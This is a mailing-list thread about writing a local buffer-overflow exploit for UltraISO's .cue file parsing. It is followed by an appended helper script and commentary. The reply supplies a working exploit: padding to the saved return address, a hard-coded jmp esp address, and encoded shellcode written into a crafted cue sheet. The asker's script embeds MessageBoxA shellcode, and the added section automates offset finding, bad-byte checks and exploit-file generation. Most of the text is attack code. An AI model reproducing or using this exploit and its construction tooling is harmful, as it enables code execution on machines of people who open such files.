Vulnerability Development mailing list archives

Re: Help developing exploit


From: "Thomas Pollet" <thomas.pollet () gmail com>
Date: Mon, 28 May 2007 16:34:50 +0200

Hi,

Try to return to a "jmp esp"; also pick one that doesn't result in an
invalid file format.

e.g.

import struct

# encoded shellcode, left exactly as posted
scode = (
    b"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
    b"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    b"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
    b"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
    b"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
    b"\x42\x50\x42\x50\x42\x30\x4b\x58\x45\x54\x4e\x33\x4b\x38\x4e\x57"
    b"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x38"
    b"\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x34\x4b\x58\x46\x33\x4b\x58"
    b"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"
    b"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
    b"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48"
    b"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x54"
    b"\x4b\x58\x4f\x35\x4e\x31\x41\x50\x4b\x4e\x4b\x38\x4e\x41\x4b\x38"
    b"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x50\x43\x4c\x41\x53"
    b"\x42\x4c\x46\x46\x4b\x48\x42\x44\x42\x43\x45\x38\x42\x4c\x4a\x37"
    b"\x4e\x50\x4b\x48\x42\x44\x4e\x50\x4b\x48\x42\x57\x4e\x51\x4d\x4a"
    b"\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x58\x42\x4b"
    b"\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x46\x4e\x43\x4f\x55\x41\x43"
    b"\x48\x4f\x42\x56\x48\x55\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57"
    b"\x42\x55\x4a\x46\x4f\x4e\x50\x4c\x42\x4e\x42\x46\x4a\x36\x4a\x49"
    b"\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x56"
    b"\x4e\x46\x43\x56\x50\x42\x45\x56\x4a\x37\x45\x36\x42\x30\x5a"
)

cue = b'FILE "'
cue += b'B' * 1099                       # padding up to the saved return address
# 77f84143:       ff e4                   jmp    *%esp
# had to try a few to get a good one (no bytes that break the cue sheet)
cue += struct.pack('<L', 0x77f84143)     # return into jmp esp; esp points at scode
cue += scode

cue += b'.bin" BINARY\n'
cue += b' TRACK 01 MODE1/2352\n   INDEX 01 00:00:00'

# binary mode, so no newline translation alters the payload bytes
with open("xpl.cue", "wb") as cue_file:
    cue_file.write(cue)
# the cue sheet references xpl.bin; an empty file next to it is enough
with open("xpl.bin", "wb") as bin_file:
    pass

Regards,
Thomas Pollet

On 26 May 2007 17:32:12 -0000, KaCo678 () aol com <KaCo678 () aol com> wrote:
Hi, I was wondering if you would be able to help. I recently found a stack overflow in UltraISO and was trying to write a local exploit for it, but I'm able to find the address where my NOP sled is, and everything I've tried hasn't worked. As you seem to be a well-respected member of the community, you might be able to help me. I've asked a few people for help with this one, but I'm still no further forward. I'll explain the best I can. I'm able to control the ECX register and EIP. I attach OllyDbg and open the cue file, the program crashes, and my EIP points to 90909090 (the NOP sled, lol). Then I press Shift+F9 and I can write anything I want to EIP, so for testing I wrote 41424344, which was written to EIP and ECX: at 3299 bytes, then the 4 bytes to write to the registers. I've provided a little test script. It's a mess, but it's just for testing, m8. Also worth noting that we still have to actually fill the rest of the file, so altogether we have 5004 bytes to the file. I hope I'm making sense. I was going to use the bouncing shared libraries method, but I'm not sure; I changed EIP to the address 0x7C80C75B (jmp ebp), as my NOPs were in there somewhere. I've written a Python script I'm using to test it. Also, if you do take a look, you will need to create a fake bin file in the same directory. Any help would be great, thanks for your time.


#!/usr/bin/python

import struct

head_file = b'FILE "'           # header of the cue sheet (6 bytes)

buffer1 = b"\x90" * 4000        # 4000 NOPs
nop = b"\x90" * 189             # 189 NOPs

# 110-byte MessageBoxA shellcode; the 4-byte immediates are hard-coded
# Windows XP SP2 API addresses, and the trailing bytes are the strings
# "user32.dll", "MessageBoxA" and "Omega7" terminated by a marker byte
shell = b"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb"
shell += b"\x77\x1d\x80\x7c"
shell += b"\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb"
shell += b"\x28\xac\x80\x7c"
shell += b"\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x06\x31\xd2\x52\x51"
shell += b"\x51\x52\xff\xd0\x31\xd2\x50\xb8\xa2\xca\x81\x7c\xff\xd0\xe8\xc4\xff"
shell += b"\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff"
shell += b"\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff"
shell += b"\xff\x4f\x6d\x65\x67\x61\x37\x4e"

padding = b"\x90" * 2           # lost 2 bytes somewhere, made them up with NOPs

offset = b"\x41\x42\x43\x44"    # "ABCD": the 4 bytes expected to land in EIP/ECX

buffer2 = b"\x45" * 701         # fill the rest of the file with junk ('E')

# end of the cue sheet: rest of the FILE line, then TRACK and INDEX lines
Head_end = b'.BIN" BINARY\r\n'
Head_end += b' TRACK 01 MODE1/2352\r\n'
Head_end += b'   INDEX 01 00:00:00'

# binary mode so the payload is written byte for byte
cue_file = open("1.cue", "wb")
cue_file.write(head_file + buffer1 + nop + shell + padding + offset + buffer2 + Head_end)
cue_file.close()


I'm very confused at the moment, as a few people have told me a few ways to exploit this, lol. But I'm still learning. I
was wondering, could I not just point my EIP to my NOP sled so my shellcode gets executed? I'm working with Windows XP
SP2. Just can't seem to get to the address of my NOP code.
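The two things this thread turns on are locating the exact offset at which the saved return address is overwritten, and choosing a return address (and payload) whose bytes survive the cue-sheet parser. The helper below is an added example written for this page; it is not code from either poster. It builds a Metasploit-style cyclic pattern so the EIP value read in the debugger maps straight back to an offset, screens a candidate address and payload for bytes likely to break the quoted FILE "..." line (NUL, CR, LF and the double quote; which bytes UltraISO's parser actually rejects is an assumption here, not something the thread establishes), and lays the file out the way the reply does: padding, the jmp esp address, the payload, then the rest of the cue sheet. The 1099-byte padding and the 0x77f84143 address are the values posted in the reply; the EIP value 0x6b42366b and the address 0x7c800a22 in the usage are constructed for illustration. The original poster's shellcode contains a 0x0a byte ("\x88\x51\x0a"), which this check would flag.

```python
import string
import struct

# Bytes assumed to terminate or corrupt the quoted filename in a .cue FILE line:
# NUL, line feed, carriage return, double quote. Which bytes the real parser
# rejects is an assumption for this example; adjust after testing in the debugger.
BAD_BYTES = frozenset(b'\x00\x0a\x0d\x22')

CUE_PREFIX = b'FILE "'
PAD_LEN = 1099            # padding before the saved return address (from the reply)
JMP_ESP = 0x77f84143      # jmp esp address used in the reply
CUE_SUFFIX = b'.bin" BINARY\n TRACK 01 MODE1/2352\n   INDEX 01 00:00:00'


def pattern_create(length):
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...). Every 4-byte window is
    unique for lengths up to 20280, so the dword that lands in EIP identifies
    its own offset."""
    out = bytearray()
    for a in string.ascii_uppercase:
        for b in string.ascii_lowercase:
            for c in string.digits:
                out += (a + b + c).encode('ascii')
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError('a pattern of %d bytes would not be unique' % length)


def pattern_offset(eip, length):
    """Offset within pattern_create(length) of the dword that overwrote EIP.
    eip is the value the debugger shows; in memory it is little-endian."""
    needle = struct.pack('<L', eip)
    idx = pattern_create(length).find(needle)
    if idx < 0:
        raise ValueError('%#010x does not come from the pattern' % eip)
    return idx


def bad_bytes_in(data):
    """Set of CUE-hostile byte values present in data (bytes, or an address
    which is packed little-endian first)."""
    if isinstance(data, int):
        data = struct.pack('<L', data)
    return set(data) & BAD_BYTES


def build_cue(ret_addr, payload, pad_len=PAD_LEN):
    """FILE "<pad><ret><payload>.bin" BINARY ... with the return address and the
    payload both checked for bytes that would break the line."""
    bad = bad_bytes_in(ret_addr)
    if bad:
        raise ValueError('return address %#010x contains bad bytes %s'
                         % (ret_addr, sorted(hex(b) for b in bad)))
    bad = bad_bytes_in(payload)
    if bad:
        raise ValueError('payload contains bad bytes %s'
                         % sorted(hex(b) for b in bad))
    return (CUE_PREFIX + b'B' * pad_len + struct.pack('<L', ret_addr)
            + payload + CUE_SUFFIX)


def write_exploit(cue, base='xpl'):
    """Write the cue sheet and the empty .bin it references, in binary mode so
    no newline translation alters the payload."""
    with open(base + '.cue', 'wb') as f:
        f.write(cue)
    with open(base + '.bin', 'wb'):
        pass


if __name__ == '__main__':
    # Step 1: crash the target with a pattern instead of NOPs, read EIP in the debugger.
    write_exploit(CUE_PREFIX + pattern_create(2000) + CUE_SUFFIX, base='probe')
    # Constructed example: a debugger showing EIP = 0x6b42366b maps back to offset 1099.
    print('offset of EIP overwrite:', pattern_offset(0x6b42366b, 2000))
    # Step 2: build the real file with a jmp esp whose bytes survive the parser.
    write_exploit(build_cue(JMP_ESP, b'\xcc' * 4))
    # A constructed address containing 0x0a and 0x22 is rejected before a file is written.
    print('bad bytes in 0x7c800a22:', sorted(hex(b) for b in bad_bytes_in(0x7c800a22)))
```

Run it once with the pattern file to recover the offset, then again with the real payload; if the jmp esp candidate or the shellcode is rejected, the offending byte values are printed so a different address or a differently encoded payload can be chosen.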